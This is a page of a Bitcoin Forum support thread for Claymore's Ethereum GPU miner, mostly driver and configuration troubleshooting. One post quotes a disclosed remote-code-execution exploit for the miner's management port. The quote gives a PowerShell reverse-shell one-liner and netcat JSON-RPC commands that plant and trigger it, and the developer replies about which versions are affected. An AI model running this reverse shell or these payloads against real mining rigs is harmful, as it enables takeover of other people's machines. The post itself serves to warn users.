Bitcoin Forum
July 07, 2020, 08:39:13 AM *
News: Latest Bitcoin Core release: 0.20.0 [Torrent]
 
   Home   Help Search Login Register More  
Pages: « 1 ... 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 [1186] 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 ... 1394 »
  Print  
Author Topic: Claymore's Dual Ethereum AMD+NVIDIA GPU Miner v15.0 (Windows/Linux)  (Read 6500846 times)
Cdlsports
Newbie
*
Offline Offline

Activity: 17
Merit: 0


View Profile
May 16, 2018, 07:27:41 PM
 #23701

my rigs have been running great, and now with the windows update nothing but crap.  I removed the windows update, however I still keep getting cant create Dag file gpu hangs in opencl call.  5 of the 7 run.  The program also sits at the  point of showing my gpus for several minutes, where it used to zip right thru to showing my gpus and setting the dag files.  I have done ddu and reinstalled blockchain drivers but still have the same issues.  Any info would be greatly appreciated
Best ratesfor crypto
EXCHANGE
Advertised sites are not endorsed by the Bitcoin Forum. They may be unsafe, untrustworthy, or illegal in your jurisdiction. Advertise here.
1594111153
Hero Member
*
Offline Offline

Posts: 1594111153

View Profile Personal Message (Offline)

Ignore
1594111153
Reply with quote  #2

1594111153
Report to moderator
1594111153
Hero Member
*
Offline Offline

Posts: 1594111153

View Profile Personal Message (Offline)

Ignore
1594111153
Reply with quote  #2

1594111153
Report to moderator
AzzAz
Legendary
*
Offline Offline

Activity: 983
Merit: 1005


View Profile
May 16, 2018, 07:52:26 PM
 #23702

my rigs have been running great, and now with the windows update nothing but crap.  I removed the windows update, however I still keep getting cant create Dag file gpu hangs in opencl call.  5 of the 7 run.  The program also sits at the  point of showing my gpus for several minutes, where it used to zip right thru to showing my gpus and setting the dag files.  I have done ddu and reinstalled blockchain drivers but still have the same issues.  Any info would be greatly appreciated
Use 18.x.x if updated to recent version (17.09 or so ). Blockchain drivers are good for 16.08. And revert works as it should only if it was fresh install/update.
BryanMeLee
Newbie
*
Offline Offline

Activity: 6
Merit: 0


View Profile
May 16, 2018, 08:19:25 PM
 #23703

Finally managed to get 11.7 running in ubuntu, had an issue where the miner couldn't find libcurl.so.4.
Only thing now is, for some reason the miner started mining devfee. Of course I don't mind except that I'm using a 1060 3gb and devfee is not supposed to mine on them anymore right?

What did you do to get it running?  Hopefully you found a workaround that allows you to have both libcurl4 and libcurl3 installed.

trader1a
Newbie
*
Offline Offline

Activity: 40
Merit: 0


View Profile
May 16, 2018, 09:42:32 PM
 #23704

Finally managed to get 11.7 running in ubuntu, had an issue where the miner couldn't find libcurl.so.4.
Only thing now is, for some reason the miner started mining devfee. Of course I don't mind except that I'm using a 1060 3gb and devfee is not supposed to mine on them anymore right?

now at 11.7 it is no fee for 3gb in windows10

Quote
Same for 3GB cards in Windows10.
janding
Newbie
*
Offline Offline

Activity: 137
Merit: 0


View Profile
May 17, 2018, 02:14:54 AM
 #23705

I keep getting this error on some of my workers randomly, any way to force Devfee to connect to normal port and not SSL/TLS ?

Code:
ETH: Stratum - Cannot connect to eu1.ethermine.org:5555
DevFee: ETH: Stratum - Failed to connect, retry in 20 sec...
DevFee: ETH: Stratum - connecting to 'eu1.ethermine.org' <51.255.64.43> port 5555 (SSL/TLS)
.
.
.
.
ETH: Stratum - Cannot connect to eu1.ethermine.org:5555
DevFee: ETH: Stratum - Failed to connect, retry in 20 sec...
DevFee: ETH: Stratum - connecting to 'eu1.ethermine.org' <91.121.167.111> port 5555 (SSL/TLS)
DevFee: ETH: Stratum - Connected (eu1.ethermine.org:4444) (unsecure)
DevFee: start mining
DevFee: ETH: 05/15/18-20:32:19 - SHARE FOUND - (GPU 4)
DevFee: ETH: 05/15/18-20:32:19 - New job from eu1.ethermine.org:4444
DevFee: ETH: 05/15/18-20:32:37 - SHARE FOUND - (GPU 1)
DevFee: ETH: 05/15/18-20:32:49 - SHARE FOUND - (GPU 5)
DevFee: ETH: 05/15/18-20:32:49 - New job from eu1.ethermine.org:4444
DevFee: stop mining and disconnect


Mining on linux, Nvidia
Miner command :
Code:
./ethdcrminer64 -epool eu1.ethermine.org:4444 -ewal walet.worker -epsw x -mode 1 -dbg -1 -esm 1

Some workers keep disconnecting and reconnecting because they cannot connect to Devpool.
Tried to set -allpools 1, and still miner tries to connect to same ssl port and after many fails it goes to normal

This is what happens when Dev fee kicks in:

http://oi65.tinypic.com/iqy6xl.jpg


Many workers go red or no reported hashrate



Any helps?

Claymore will always devfee on the ssl 5555 port if you use a pool that has the ssl enabled.
If you fix the issues with your connections that problem will go away. The problem is on your end.
He uses that port because of all the cheats out there that can bypass the devfee if he mines to the non secure 4444 port.
I don't blame him.
iSuX
Jr. Member
*
Offline Offline

Activity: 42
Merit: 8


View Profile
May 17, 2018, 07:24:21 AM
 #23706

Is it possible now or in a future version to move dcri and dcoin settings to dpools.txt?

Interesting question, why would you want to do that?
Pools relates to, (references), the pool and fallback pools you're mining with.

dcri relates to the hardware, tuning etc, (no relation to pool, at least not that I can see).

What situation are you trying to solve here?

Note: You can very easily have multiple batch files, containing a full config set, or use the config.txt for hardware setup, (dcri etc), and use a simplified batchfile to start, (referencing config.txt and pool.txt files).

Claymore is pretty nicely architectured in that sense, multiple configuration methods, depending on your use case or preference.

Also, a note on "moving", changing architecture in such a drastic way, is generally a very bad idea, unless there is a specific showstopper bug, (not likely in a more mature package). But essentially if you do that, you have a branch, and create a legacy of shit for users.
The mature users will know the old way, and the new users will probably only know the new way.

The reality of this is, endless questions about why "it" does not work from the very same people who never read the readme.

This is still an interesting question though, can you please add some background as to why you'd want dcri in the pools.txt file?

Happy mining.



KISS. Did you read the Readme.txt?
Summarise/Itemise your hardware/versions/expectations/batchfile & results. The more specific, detailed, the better
FarmFrenzy
Jr. Member
*
Offline Offline

Activity: 224
Merit: 5


View Profile
May 17, 2018, 09:56:11 AM
 #23707

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?
AzzAz
Legendary
*
Offline Offline

Activity: 983
Merit: 1005


View Profile
May 17, 2018, 11:28:54 AM
 #23708

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.
LJLT
Newbie
*
Offline Offline

Activity: 48
Merit: 0


View Profile
May 17, 2018, 02:03:22 PM
 #23709

Anyone has anyidea whats happening with ethermine.org? or is it Claymore or what? is it my connection?

I got Failovers but the hashrate is the same as always

https://imgur.com/a/I9uo2x0
kirilvvbg
Full Member
***
Offline Offline

Activity: 213
Merit: 100


View Profile
May 17, 2018, 02:09:27 PM
 #23710

Hi Claymore,

Can you add new event in EthereumManager - about rejected shares.
Not sure if it could be managed by user - to target specific ratio accepted/rejected, to put some limit, etc.
Or at least to be preset by you - rejected shares as % of the accepted.

The point is to get notification that a GPU is not working properly for some reason (pool, clock, whatever).
So that a proper action could be taken.

I hope you understand my desire.
In case that this is already possible in the remote manager - sorry for bothering. But please point how to do it.

Thanks
KVV
cabri
Newbie
*
Offline Offline

Activity: 11
Merit: 0


View Profile
May 17, 2018, 02:17:17 PM
 #23711

For 3GB Mining on Win10, use 376.33 Version of Nvidia Driver. Now, It is working without -eres command.
FarmFrenzy
Jr. Member
*
Offline Offline

Activity: 224
Merit: 5


View Profile
May 17, 2018, 06:32:10 PM
 #23712

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.

Thank you for the answer. But I read many messages before - people wrote here that they use the newest Windows version with blockchain drivers and it works fine.
What driver do you suggest to use in this case?
blockaudit
Jr. Member
*
Offline Offline

Activity: 34
Merit: 2

Helping the blockchain world build secure++ stuff!


View Profile WWW
May 17, 2018, 06:40:10 PM
 #23713

FYI a remote exploit for v7.3+ was made public:

https://reversebrain.github.io/2018/02/01/Claymore-Dual-Miner-Remote-Code-Execution/
https://www.exploit-db.com/exploits/44638/

Quote
Suppose the miner is running on localhost on port 3333. First of all you need to convert a .bat string into hexadecimal format, for example, this one uses powershell to spawn a reverse shell on localhost listening on port 1234:
 
powershell.exe -Command "$client = New-Object System.Net.Sockets.TCPClient('127.0.0.1',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
 
Convert it into hexadecimal and paste it on the second parameter inside this string:
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_file","params":["reboot.bat","HEX_STRING"]}' | nc 127.0.0.1 3333 -v
 
Then, to trigger the vulnerability just send {"id":0,"jsonrpc":"2.0","method":"miner_reboot"}
string to the miner.
 
echo '{"id":0,"jsonrpc":"2.0","method":"miner_reboot"}' | nc 127.0.0.1 3333 -v
 
You got the shell!
 
This exploit works also on Linux, just substitute reboot.bat with reboot.bash or reboot.sh.

It's unclear if this issue has been fixed or not, feel free to provide more information on what versions if was fixed on if so.

Quote
Before continuing to read I want to clarify that I already emailed nanopool without receiving any kind or response, so I’m publicly disclosure this vulnerability waiting for a CVE assignment.

https://www.blockaudit.org
Raja_MBZ
Legendary
*
Offline Offline

Activity: 1610
Merit: 1383


Any questions related to my signature site? PM me!


View Profile
May 17, 2018, 09:57:46 PM
 #23714

Anyone has anyidea whats happening with ethermine.org? or is it Claymore or what? is it my connection?

I got Failovers but the hashrate is the same as always

https://imgur.com/a/I9uo2x0

Well I'm using ethermine.org along with Claymore miner as well and not having any issue similar to that. However, I do remember that it happened a few months back when I had under-volted too much using Claymore miner's integrated under-volting feature. Once I raised the voltage (mV) back a bit, it started to work fine.

Are you using any sort of over-clocking or under-volting options of the miner?

Claymore
Donator
Legendary
*
Offline Offline

Activity: 1610
Merit: 1320

Miners developer


View Profile
May 17, 2018, 10:51:25 PM
 #23715


More precisely, it works until v8.1, in v8.1 "-mport" is working in read-only mode by default, check "History.txt" file for details. Another thing required for this "exploit" is direct access to internet for the system, it will not work via NAT or firewall without your permission.
Later versions had another issue that was fixed too, see my message:
https://bitcointalk.org/index.php?topic=1433925.msg28540417#msg28540417

Please read Readme and FAQ in the first post of this thread before asking any questions, probably the answer is already there.
List of my miners: https://bitcointalk.org/index.php?topic=3019607
AzzAz
Legendary
*
Offline Offline

Activity: 983
Merit: 1005


View Profile
May 18, 2018, 12:45:16 AM
 #23716

Hi! Happy mining to all!

Newbies's  here! I use Claymore with 6x RX 580 GPUs on Windows 10 1803 and Radeon blockchain driver. The mode is ETH solo and here is my configs:
Code:
EthDcrMiner64.exe -epool eu2.ethermine.org:4444 -ewal 0xxxxxxxxxxxxxxxxxxxxxxxxxxx. -epsw x -ethi 4 -tt 68 -fanmin 80

When I use all 6 GPUs my system reboots every 5-10 minutes (with help of the watchog). When I use only 3-4 GPU it works perfectly. I tried to use different ones - any of them work well.

Is the cause in my power supply? It is some chinese branded 1600 W for $160. Or may be any other reasons for this case?


it's 1803 and driver combo.

Thank you for the answer. But I read many messages before - people wrote here that they use the newest Windows version with blockchain drivers and it works fine.
What driver do you suggest to use in this case?

18.x.x   like 18.3.4. Sometimes it works with 1803, even 18.4.x sometimes do, but most secure 18.3.4 with 1803 uninstalled (best from fresh win10 installation-updated )
pepi04
Newbie
*
Offline Offline

Activity: 5
Merit: 0


View Profile
May 18, 2018, 08:30:52 AM
 #23717

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?
leonix007
Sr. Member
****
Offline Offline

Activity: 966
Merit: 297


Grow with community


View Profile
May 18, 2018, 10:16:16 AM
 #23718

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?

try these drivers that were already suggestion earlier

For 3GB Mining on Win10, use 376.33 Version of Nvidia Driver. Now, It is working without -eres command.
Call_Me_Bambi
Sr. Member
****
Offline Offline

Activity: 504
Merit: 259


View Profile
May 18, 2018, 10:33:04 AM
 #23719

Can anyone help me going please....

I get the "not enough GPU memory to place DAG" message, but feel my hardware should be sufficient?

AMD Athlon A10-7870K Godavari, Quad-Core, 4x3.9GHz, 4MB L2-cache, AMD Radeon R7 integrated
Nvidea GeForce GTX 1050 Ti 4 GB

Can anyone help me getting the config to work?

It could be the "AMD Radeon R7 integrated" that's causing the problem (not enough memory). Try removing it from the mining config using the "-di" option; see OP for a detailed description on this.

Examples:

Code:
EthDcrMiner64.exe -epool us1.ethpool.org:3333 -ewal 0xD...E6F -epsw x -di 0
or
 EthDcrMiner64.exe -epool us1.ethpool.org:3333 -ewal 0xD...E6F -epsw x -di 1
androstan1234
Jr. Member
*
Offline Offline

Activity: 252
Merit: 6


View Profile
May 18, 2018, 11:48:33 AM
 #23720

fyi updated to 1803 and zero issues using 18.2.1 driver.  Mixed amd/nvidia rigs.
Pages: « 1 ... 1136 1137 1138 1139 1140 1141 1142 1143 1144 1145 1146 1147 1148 1149 1150 1151 1152 1153 1154 1155 1156 1157 1158 1159 1160 1161 1162 1163 1164 1165 1166 1167 1168 1169 1170 1171 1172 1173 1174 1175 1176 1177 1178 1179 1180 1181 1182 1183 1184 1185 [1186] 1187 1188 1189 1190 1191 1192 1193 1194 1195 1196 1197 1198 1199 1200 1201 1202 1203 1204 1205 1206 1207 1208 1209 1210 1211 1212 1213 1214 1215 1216 1217 1218 1219 1220 1221 1222 1223 1224 1225 1226 1227 1228 1229 1230 1231 1232 1233 1234 1235 1236 ... 1394 »
  Print  
 
Jump to:  

Sponsored by , a Bitcoin-accepting VPN.
Powered by MySQL Powered by PHP Powered by SMF 1.1.19 | SMF © 2006-2009, Simple Machines Valid XHTML 1.0! Valid CSS!